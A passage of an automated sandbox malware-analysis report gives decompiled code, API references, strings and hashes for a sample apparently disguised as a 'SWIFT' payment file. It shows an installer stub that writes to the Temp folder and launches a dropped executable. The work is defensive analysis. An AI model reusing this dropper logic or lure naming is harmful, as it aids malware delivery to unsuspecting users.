					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNELBASE(746AFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404453
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404524
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042b8
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32 ref: 00404179
GetDlgItem.USER32 ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32 ref: 0040425E
GetDlgItem.USER32 ref: 00404268
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32 ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
EnableWindow.USER32(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
EnableMenuItem.USER32 ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00423748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 2475350683-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403da7
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,?,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,746AFAA0), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,?,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,00000000,?), ref: 00403E36
LoadImageW.USER32 ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32 ref: 00403EBC
SystemParametersInfoW.USER32 ref: 00403ED4
CreateWindowExW.USER32 ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32 ref: 00403F6B
GetClassInfoW.USER32 ref: 00403F78
RegisterClassW.USER32 ref: 00403F81
DialogBoxParamW.USER32 ref: 00403FA0

Strings

RichEdit, xrefs: 00403F72
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
1033, xrefs: 00403D37, 00403D93
.exe, xrefs: 00403E25
H7B, xrefs: 00403D43
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
_Nb, xrefs: 00403E9B, 00403F03
"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
RichEd32, xrefs: 00403F53
C:\Users\user\AppData\Local\Temp, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
RichEdit20W, xrefs: 00403F63, 00403F69
RichEd20, xrefs: 00403F45
.DEFAULT\Control Panel\International, xrefs: 00403D83

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2848850402
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\engineer\\AppData\\Roaming", L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\engineer\\AppData\\Roaming"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
